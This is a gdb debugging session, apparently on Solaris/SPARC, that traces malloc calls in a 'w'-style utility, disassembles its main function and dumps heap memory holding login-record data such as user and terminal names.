(gdb) b _malloc_unlocked
Breakpoint 2 at 0xff2c1dc8
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) n
Program not restarted.
(gdb) r -h foo
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32 -h foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0xff2b624c in calloc () from /usr/lib/libc.so.1
#3 0xff2fabb4 in textdomain () from /usr/lib/libc.so.1
#4 0x00010ee8 in main ()
(gdb) disas main
Dump of assembler code for function main:
0x10ec4 <main>: save %sp, -1992, %sp
0x10ec8 <main+4>: sethi %hi(0x12000), %g2
0x10ecc <main+8>: mov %i0, %i3
0x10ed0 <main+12>: add %g2, 0x194, %o1
0x10ed4 <main+16>: call 0x22490 <setlocale>
0x10ed8 <main+20>: mov 6, %o0
0x10edc <main+24>: sethi %hi(0x12000), %g2
0x10ee0 <main+28>: call 0x2249c <textdomain>
0x10ee4 <main+32>: add %g2, 0x198, %o0 ! 0x12198 <_lib_version+8>
0x10ee8 <main+36>: ld [ %i1 ], %g2
0x10eec <main+40>: ldsb [ %g2 ], %g2
0x10ef0 <main+44>: cmp %g2, 0x2d
0x10ef4 <main+48>: mov 1, %g2
0x10ef8 <main+52>: be 0x10f04 <main+64>
0x10efc <main+56>: sethi %hi(0x22800), %l0
0x10f00 <main+60>: clr %g2
0x10f04 <main+64>: ld [ %i1 ], %o0
0x10f08 <main+68>: st %g2, [ %l0 + 0x1ec ]
0x10f0c <main+72>: call 0x224a8 <strrchr>
0x10f10 <main+76>: mov 0x2f, %o1
0x10f14 <main+80>: ld [ %l0 + 0x1ec ], %g2
0x10f18 <main+84>: cmp %g2, 0
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) p/x $i0
$1 = 0x18
(gdb) r -sh foo
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32 -sh foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1d24 in _smalloc () from /usr/lib/libc.so.1
#2 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#3 0xff2b624c in calloc () from /usr/lib/libc.so.1
#4 0xff2fabb4 in textdomain () from /usr/lib/libc.so.1
#5 0x00010ee8 in main ()
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0xff2fc22c in _textdomain_u () from /usr/lib/libc.so.1
#3 0xff2fabec in textdomain () from /usr/lib/libc.so.1
#4 0x00010ee8 in main ()
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1d24 in _smalloc () from /usr/lib/libc.so.1
#2 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#3 0xff2fc22c in _textdomain_u () from /usr/lib/libc.so.1
#4 0xff2fabec in textdomain () from /usr/lib/libc.so.1
#5 0x00010ee8 in main ()
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0x000110b4 in main ()
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0xff30f22c in _findbuf () from /usr/lib/libc.so.1
#3 0xff30f0e0 in _filbuf () from /usr/lib/libc.so.1
#4 0xff312cf8 in fread () from /usr/lib/libc.so.1
#5 0xff2bd91c in getutxent_frec () from /usr/lib/libc.so.1
#6 0xff2bd9c4 in getutxent () from /usr/lib/libc.so.1
#7 0x000110dc in main ()
(gdb) c
Continuing.
Breakpoint 1, 0x00011114 in main ()
(gdb) x/96000x 0x33000
0x33000: 0x00000000 0x00000000 0x00000000 0x00000000
0x33010: 0x00000000 0x00000000 0x00000000 0x00000000
0x33020: 0x00002009 0x00000000 0x00000000 0x00000000
0x33030: 0x00000000 0x00000000 0x00000000 0x00000000
0x33040: 0x00000000 0x732f3136 0x7074732f 0x31360000
0x33050: 0x00000000 0x00000000 0x00000000 0x00000000
0x33060: 0x00000000 0x00000000 0x000014fd 0x00080000
0x33070: 0x00000000 0x52526920 0x00082de6 0x00000000
0x33080: 0x00000000 0x00000000 0x00000000 0x00000000
0x33090: 0x00000000 0x00000000 0x00000000 0x00000000
0x330a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33100: 0x00000000 0x00000000 0x00000000 0x00000000
0x33110: 0x00000000 0x00000000 0x00000000 0x00000000
0x33120: 0x00000000 0x00000000 0x00000000 0x00000000
0x33130: 0x00000000 0x00000000 0x00000000 0x00000000
0x33140: 0x00000000 0x00000000 0x00000000 0x00000000
0x33150: 0x00000000 0x00000000 0x00000000 0x00000000
0x33160: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x33170: 0x00000000 0x00000000 0x00000000 0x00000000
0x33180: 0x00000000 0x00000000 0x00000000 0x00000000
0x33190: 0x00000000 0x0000002f 0x62617a7a 0x00000000
0x331a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x331b0: 0x00000000 0x00000000 0x72313030 0x7074732f
0x331c0: 0x34000000 0x00000000 0x00000000 0x00000000
0x331d0: 0x00000000 0x00000000 0x00000000 0x000056cb
0x331e0: 0x00080000 0x00000ba1 0x5440c4dc 0x00000000
0x331f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33200: 0x00000000 0x00000000 0x000a6c6f 0x63616c68
0x33210: 0x6f737400 0x00000000 0x00000000 0x00000000
0x33220: 0x00000000 0x00000000 0x00000000 0x00000000
0x33230: 0x00000000 0x00000000 0x00000000 0x00000000
0x33240: 0x00000000 0x00000000 0x00000000 0x00000000
0x33250: 0x00000000 0x00000000 0x00000000 0x00000000
0x33260: 0x00000000 0x00000000 0x00000000 0x00000000
0x33270: 0x00000000 0x00000000 0x00000000 0x00000000
0x33280: 0x00000000 0x00000000 0x00000000 0x00000000
0x33290: 0x00000000 0x00000000 0x00000000 0x00000000
0x332a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x332b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x332c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x332d0: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x332e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x332f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33300: 0x00000000 0x00000000 0x00000000 0x62617a7a
0x33310: 0x00000000 0x00000000 0x00000000 0x00000000
0x33320: 0x00000000 0x00000000 0x00000000 0x2f320000
0x33330: 0x7074732f 0x32000000 0x00000000 0x00000000
0x33340: 0x00000000 0x00000000 0x00000000 0x00000000
0x33350: 0x000003ce 0x00080000 0x000007a8 0x5438d560
0x33360: 0x00000000 0x00000000 0x00000000 0x00000000
0x33370: 0x00000000 0x00000000 0x00000000 0x000b3a70
0x33380: 0x74732f31 0x3a532e30 0x00000000 0x00000000
0x33390: 0x00000000 0x00000000 0x00000000 0x00000000
0x333a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x333b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x333c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x333d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x333e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x333f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33400: 0x00000000 0x00000000 0x00000000 0x00000000
0x33410: 0x00000000 0x00000000 0x00000000 0x00000000
0x33420: 0x00000000 0x00000000 0x00000000 0x00000000
0x33430: 0x00000000 0x00000000 0x00000000 0x00000000
0x33440: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x33450: 0x00000000 0x00000000 0x00000000 0x00000000
0x33460: 0x00000000 0x00000000 0x00000000 0x00000000
0x33470: 0x00000000 0x00000000 0x00000000 0x000000a0
0x33480: 0x62617a7a 0x00000000 0x00000000 0x00000000
0x33490: 0x00000000 0x00000000 0x00000000 0x00000000
0x334a0: 0x2f330000 0x7074732f 0x33000000 0x00000000
0x334b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x334c0: 0x00000000 0x00004027 0x00080000 0x000007a8
0x334d0: 0x543f3195 0x00000000 0x00000000 0x00000000
0x334e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x334f0: 0x000b3a70 0x74732f37 0x3a532e30 0x00000000
0x33500: 0x00000000 0x00000000 0x00000000 0x00000000
0x33510: 0x00000000 0x00000000 0x00000000 0x00000000
0x33520: 0x00000000 0x00000000 0x00000000 0x00000000
0x33530: 0x00000000 0x00000000 0x00000000 0x00000000
0x33540: 0x00000000 0x00000000 0x00000000 0x00000000
0x33550: 0x00000000 0x00000000 0x00000000 0x00000000
0x33560: 0x00000000 0x00000000 0x00000000 0x00000000
0x33570: 0x00000000 0x00000000 0x00000000 0x00000000
0x33580: 0x00000000 0x00000000 0x00000000 0x00000000
0x33590: 0x00000000 0x00000000 0x00000000 0x00000000
0x335a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x335b0: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x335c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x335d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x335e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x335f0: 0x000000a0 0x66616b65 0x6d616e00 0x00000000
0x33600: 0x00000000 0x00000000 0x00000000 0x00000000
0x33610: 0x00000000 0x61616161 0x7074732f 0x2f2f3300
0x33620: 0x00000000 0x00000000 0x00000000 0x00000000
0x33630: 0x00000000 0x00000000 0x00002328 0x0008000a
0x33640: 0x000107a8 0x000186a0 0x00002710 0x00000004
0x33650: 0x00000000 0x00000000 0x00000000 0x00000000
0x33660: 0x00000000 0x00056261 0x7a7a0000 0x00000000
0x33670: 0x00000000 0x00000000 0x00000000 0x00000000
0x33680: 0x00000000 0x00000000 0x00000000 0x00000000
0x33690: 0x00000000 0x00000000 0x00000000 0x00000000
0x336a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x336b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x336c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x336d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x336e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x336f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33700: 0x00000000 0x00000000 0x00000000 0x00000000
0x33710: 0x00000000 0x00000000 0x00000000 0x00000000
0x33720: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x33730: 0x00000000 0x00000000 0x00000000 0x00000000
0x33740: 0x00000000 0x00000000 0x00000000 0x00000000
0x33750: 0x00000000 0x00000000 0x00000000 0x00000000
0x33760: 0x00000000 0x00000050 0x66616b65 0x6d616e00
0x33770: 0x00000000 0x00000000 0x00000000 0x00000000
0x33780: 0x00000000 0x00000000 0x61616162 0x7074732f
0x33790: 0x2f2f3300 0x00000000 0x00000000 0x00000000
0x337a0: 0x00000000 0x00000000 0x00000000 0x00002328
0x337b0: 0x0008000a 0x000107a8 0x000186a0 0x00002710
0x337c0: 0x00000004 0x00000000 0x00000000 0x00000000
0x337d0: 0x00000000 0x00000000 0x00056261 0x7a7a0000
0x337e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x337f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33800: 0x00000000 0x00000000 0x00000000 0x00000000
0x33810: 0x00000000 0x00000000 0x00000000 0x00000000
0x33820: 0x00000000 0x00000000 0x00000000 0x00000000
0x33830: 0x00000000 0x00000000 0x00000000 0x00000000
0x33840: 0x00000000 0x00000000 0x00000000 0x00000000
0x33850: 0x00000000 0x00000000 0x00000000 0x00000000
0x33860: 0x00000000 0x00000000 0x00000000 0x00000000
0x33870: 0x00000000 0x00000000 0x00000000 0x00000000
0x33880: 0x00000000 0x00000000 0x00000000 0x00000000
0x33890: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x338a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x338b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x338c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x338d0: 0x00000000 0x00000000 0x00000050 0x00000000
0x338e0: 0x00000048 0x7a736d6f 0x6e000000 0x00000000
0x338f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33900: 0x00000000 0x504d3130 0x00000000 0x00000000
0x33910: 0x00000000 0x00000000 0x00000000 0x00000000
0x33920: 0x00000000 0x00000000 0x00000187 0x00060000
0x33930: 0x00000101 0x5144b175 0x00000000 0x00000000
0x33940: 0x00000000 0x00000000 0x00000000 0x00000000
0x33950: 0x00000000 0x00000000 0x00000000 0x00000000
0x33960: 0x00000000 0x00000000 0x00000000 0x00000000
0x33970: 0x00000000 0x00000000 0x00000000 0x00000000
0x33980: 0x00000000 0x00000000 0x00000000 0x00000000
0x33990: 0x00000000 0x00000000 0x00000000 0x00000000
0x339a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x339b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x339c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x339d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x339e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x339f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33a00: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x33a10: 0x00000000 0x00000000 0x00000000 0x00000000
0x33a20: 0x00000000 0x00000000 0x00000000 0x00000000
0x33a30: 0x00000000 0x00000000 0x00000000 0x00000000
0x33a40: 0x00000000 0x00000000 0x00000000 0x00000000
0x33a50: 0x00000000 0x000000a4 0x62617a7a 0x00000000
0x33a60: 0x00000000 0x00000000 0x00000000 0x00000000
0x33a70: 0x00000000 0x00000000 0x74732f31 0x7074732f
0x33a80: 0x31000000 0x00000000 0x00000000 0x00000000
0x33a90: 0x00000000 0x00000000 0x00000000 0x0000023a
0x33aa0: 0x00070000 0x00000000 0x54554c5e 0x0006b034
0x33ab0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33ac0: 0x00000000 0x00000000 0x000f766d 0x37322e63
0x33ad0: 0x732e756d 0x622e6564 0x75000000 0x00000000
0x33ae0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33af0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33b00: 0x00000000 0x00000000 0x00000000 0x00000000
0x33b10: 0x00000000 0x00000000 0x00000000 0x00000000
0x33b20: 0x00000000 0x00000000 0x00000000 0x00000000
0x33b30: 0x00000000 0x00000000 0x00000000 0x00000000
0x33b40: 0x00000000 0x00000000 0x00000000 0x00000000
0x33b50: 0x00000000 0x00000000 0x00000000 0x00000000
0x33b60: 0x00000000 0x00000000 0x00000000 0x00000000
0x33b70: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x33b80: 0x00000000 0x00000000 0x00000000 0x00000000
0x33b90: 0x00000000 0x00000000 0x00000000 0x00000000
0x33ba0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33bb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33bc0: 0x00000000 0x00000000 0x00000018 0x62617a7a
0x33bd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33be0: 0x00000000 0x00000000 0x00000000 0x74732f32
0x33bf0: 0x7074732f 0x32000000 0x00000000 0x00000000
0x33c00: 0x00000000 0x00000000 0x00000000 0x00000000
0x33c10: 0x000003db 0x00070000 0x00000000 0x54556b71
0x33c20: 0x00007555 0x00000000 0x00000000 0x00000000
0x33c30: 0x00000000 0x00000000 0x00000000 0x000f766d
0x33c40: 0x37322e63 0x732e756d 0x622e6564 0x75000000
0x33c50: 0x00000000 0x00000000 0x00000000 0x00000000
0x33c60: 0x00000000 0x00000000 0x00000000 0x00000000
0x33c70: 0x00000000 0x00000000 0x00000000 0x00000000
0x33c80: 0x00000000 0x00000000 0x00000000 0x00000000
0x33c90: 0x00000000 0x00000000 0x00000000 0x00000000
0x33ca0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33cb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33cc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33cd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33ce0: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x33cf0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33d00: 0x00000000 0x00000000 0x00000000 0x00000000
0x33d10: 0x00000000 0x00000000 0x00000000 0x00000000
0x33d20: 0x00000000 0x00000000 0x00000000 0x00000000
0x33d30: 0x00000000 0x00000000 0x00000000 0x00000018
0x33d40: 0x62617a7a 0x00000000 0x00000000 0x00000000
0x33d50: 0x00000000 0x00000000 0x00000000 0x00000000
0x33d60: 0x74732f33 0x7074732f 0x33000000 0x00000000
0x33d70: 0x00000000 0x00000000 0x00000000 0x00000000
0x33d80: 0x00000000 0x0000041a 0x00070000 0x00000000
0x33d90: 0x54556dfb 0x000a22b2 0x00000000 0x00000000
0x33da0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33db0: 0x000f766d 0x37322e63 0x732e756d 0x622e6564
0x33dc0: 0x75000000 0x00000000 0x00000000 0x00000000
0x33dd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33de0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33df0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33e00: 0x00000000 0x00000000 0x00000000 0x00000000
0x33e10: 0x00000000 0x00000000 0x00000000 0x00000000
0x33e20: 0x00000000 0x00000000 0x00000000 0x00000000
0x33e30: 0x00000000 0x00000000 0x00000000 0x00000000
0x33e40: 0x00000000 0x00000000 0x00000000 0x00000000
0x33e50: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x33e60: 0x00000000 0x00000000 0x00000000 0x00000000
0x33e70: 0x00000000 0x00000000 0x00000000 0x00000000
0x33e80: 0x00000000 0x00000000 0x00000000 0x00000000
0x33e90: 0x00000000 0x00000000 0x00000000 0x00000000
0x33ea0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33eb0: 0x000000d8 0x62617a7a 0x00000000 0x00000000
0x33ec0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33ed0: 0x00000000 0x74732f34 0x7074732f 0x34000000
0x33ee0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33ef0: 0x00000000 0x00000000 0x0000046f 0x00070000
0x33f00: 0x00000000 0x54557127 0x000b5fd5 0x00000000
0x33f10: 0x00000000 0x00000000 0x00000000 0x00000000
0x33f20: 0x00000000 0x000f766d 0x37322e63 0x732e756d
0x33f30: 0x622e6564 0x75000000 0x00000000 0x00000000
0x33f40: 0x00000000 0x00000000 0x00000000 0x00000000
0x33f50: 0x00000000 0x00000000 0x00000000 0x00000000
0x33f60: 0x00000000 0x00000000 0x00000000 0x00000000
0x33f70: 0x00000000 0x00000000 0x00000000 0x00000000
0x33f80: 0x00000000 0x00000000 0x00000000 0x00000000
0x33f90: 0x00000000 0x00000000 0x00000000 0x00000000
0x33fa0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33fb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33fc0: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x33fd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33fe0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33ff0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34000: 0x00000000 0x00000000 0x00000000 0x00000000
0x34010: 0x00000000 0x00000000 0x00000000 0x00000000
0x34020: 0x00000000 0x000000d8 0x62617a7a 0x00000000
0x34030: 0x00000000 0x00000000 0x00000000 0x00000000
0x34040: 0x00000000 0x00000000 0x74732f35 0x7074732f
0x34050: 0x35000000 0x00000000 0x00000000 0x00000000
0x34060: 0x00000000 0x00000000 0x00000000 0x00007467
0x34070: 0x00080000 0x00000000 0x544b6439 0x0001fa71
0x34080: 0x00000000 0x00000000 0x00000000 0x00000000
0x34090: 0x00000000 0x00000000 0x00000000 0x00000000
0x340a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34100: 0x00000000 0x00000000 0x00000000 0x00000000
0x34110: 0x00000000 0x00000000 0x00000000 0x00000000
0x34120: 0x00000000 0x00000000 0x00000000 0x00000000
0x34130: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x34140: 0x00000000 0x00000000 0x00000000 0x00000000
0x34150: 0x00000000 0x00000000 0x00000000 0x00000000
0x34160: 0x00000000 0x00000000 0x00000000 0x00000000
0x34170: 0x00000000 0x00000000 0x00000000 0x00000000
0x34180: 0x00000000 0x00000000 0x00000000 0x00000000
0x34190: 0x00000000 0x00000000 0x0000002f 0x62617a7a
0x341a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x341b0: 0x00000000 0x00000000 0x00000000 0x74732f36
0x341c0: 0x7074732f 0x36000000 0x00000000 0x00000000
0x341d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x341e0: 0x00007497 0x00080000 0x00000000 0x544b6438
0x341f0: 0x000e757d 0x00000000 0x00000000 0x00000000
0x34200: 0x00000000 0x00000000 0x00000000 0x00000000
0x34210: 0x00000000 0x00000000 0x00000000 0x00000000
0x34220: 0x00000000 0x00000000 0x00000000 0x00000000
0x34230: 0x00000000 0x00000000 0x00000000 0x00000000
0x34240: 0x00000000 0x00000000 0x00000000 0x00000000
0x34250: 0x00000000 0x00000000 0x00000000 0x00000000
0x34260: 0x00000000 0x00000000 0x00000000 0x00000000
0x34270: 0x00000000 0x00000000 0x00000000 0x00000000
0x34280: 0x00000000 0x00000000 0x00000000 0x00000000
0x34290: 0x00000000 0x00000000 0x00000000 0x00000000
0x342a0: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x342b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x342c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x342d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x342e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x342f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34300: 0x00000000 0x00000000 0x00000000 0x0000002f
0x34310: 0x62617a7a 0x00000000 0x00000000 0x00000000
0x34320: 0x00000000 0x00000000 0x00000000 0x00000000
0x34330: 0x74732f37 0x7074732f 0x37000000 0x00000000
0x34340: 0x00000000 0x00000000 0x00000000 0x00000000
0x34350: 0x00000000 0x000074a9 0x00080000 0x00000000
0x34360: 0x544b6438 0x000ba288 0x00000000 0x00000000
0x34370: 0x00000000 0x00000000 0x00000000 0x00000000
0x34380: 0x00000000 0x00000000 0x00000000 0x00000000
0x34390: 0x00000000 0x00000000 0x00000000 0x00000000
0x343a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x343b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x343c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x343d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x343e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x343f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34400: 0x00000000 0x00000000 0x00000000 0x00000000
0x34410: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x34420: 0x00000000 0x00000000 0x00000000 0x00000000
0x34430: 0x00000000 0x00000000 0x00000000 0x00000000
0x34440: 0x00000000 0x00000000 0x00000000 0x00000000
0x34450: 0x00000000 0x00000000 0x00000000 0x00000000
0x34460: 0x00000000 0x00000000 0x00000000 0x00000000
0x34470: 0x00000000 0x00000000 0x00000000 0x00000000
0x34480: 0x0000002f 0x62617a7a 0x00000000 0x00000000
0x34490: 0x00000000 0x00000000 0x00000000 0x00000000
0x344a0: 0x00000000 0x74732f38 0x7074732f 0x38000000
0x344b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x344c0: 0x00000000 0x00000000 0x000074d9 0x00080000
0x344d0: 0x00000000 0x544b6438 0x0008c36e 0x00000000
0x344e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x344f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34500: 0x00000000 0x00000000 0x00000000 0x00000000
0x34510: 0x00000000 0x00000000 0x00000000 0x00000000
0x34520: 0x00000000 0x00000000 0x00000000 0x00000000
0x34530: 0x00000000 0x00000000 0x00000000 0x00000000
0x34540: 0x00000000 0x00000000 0x00000000 0x00000000
0x34550: 0x00000000 0x00000000 0x00000000 0x00000000
0x34560: 0x00000000 0x00000000 0x00000000 0x00000000
0x34570: 0x00000000 0x00000000 0x00000000 0x00000000
0x34580: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x34590: 0x00000000 0x00000000 0x00000000 0x00000000
0x345a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x345b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x345c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x345d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x345e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x345f0: 0x00000000 0x0000002f 0x62617a7a 0x00000000
0x34600: 0x00000000 0x00000000 0x00000000 0x00000000
0x34610: 0x00000000 0x00000000 0x74732f39 0x7074732f
0x34620: 0x39000000 0x00000000 0x00000000 0x00000000
0x34630: 0x00000000 0x00000000 0x00000000 0x000074f3
0x34640: 0x00080000 0x00000000 0x544b6438 0x0002c7ad
0x34650: 0x00000000 0x00000000 0x00000000 0x00000000
0x34660: 0x00000000 0x00000000 0x00000000 0x00000000
0x34670: 0x00000000 0x00000000 0x00000000 0x00000000
0x34680: 0x00000000 0x00000000 0x00000000 0x00000000
0x34690: 0x00000000 0x00000000 0x00000000 0x00000000
0x346a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x346b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x346c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x346d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x346e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x346f0: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x34700: 0x00000000 0x00000000 0x00000000 0x00000000
0x34710: 0x00000000 0x00000000 0x00000000 0x00000000
0x34720: 0x00000000 0x00000000 0x00000000 0x00000000
0x34730: 0x00000000 0x00000000 0x00000000 0x00000000
0x34740: 0x00000000 0x00000000 0x00000000 0x00000000
0x34750: 0x00000000 0x00000000 0x00000000 0x00000000
0x34760: 0x00000000 0x00000000 0x0000002f 0x62617a7a
0x34770: 0x00000000 0x00000000 0x00000000 0x00000000
0x34780: 0x00000000 0x00000000 0x00000000 0x732f3130
0x34790: 0x7074732f 0x31300000 0x00000000 0x00000000
0x347a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x347b0: 0x00007501 0x00080000 0x00000000 0x544b6437
0x347c0: 0x000cbf95 0x00000000 0x00000000 0x00000000
0x347d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x347e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x347f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34800: 0x00000000 0x00000000 0x00000000 0x00000000
0x34810: 0x00000000 0x00000000 0x00000000 0x00000000
0x34820: 0x00000000 0x00000000 0x00000000 0x00000000
0x34830: 0x00000000 0x00000000 0x00000000 0x00000000
0x34840: 0x00000000 0x00000000 0x00000000 0x00000000
0x34850: 0x00000000 0x00000000 0x00000000 0x00000000
0x34860: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x34870: 0x00000000 0x00000000 0x00000000 0x00000000
0x34880: 0x00000000 0x00000000 0x00000000 0x00000000
0x34890: 0x00000000 0x00000000 0x00000000 0x00000000
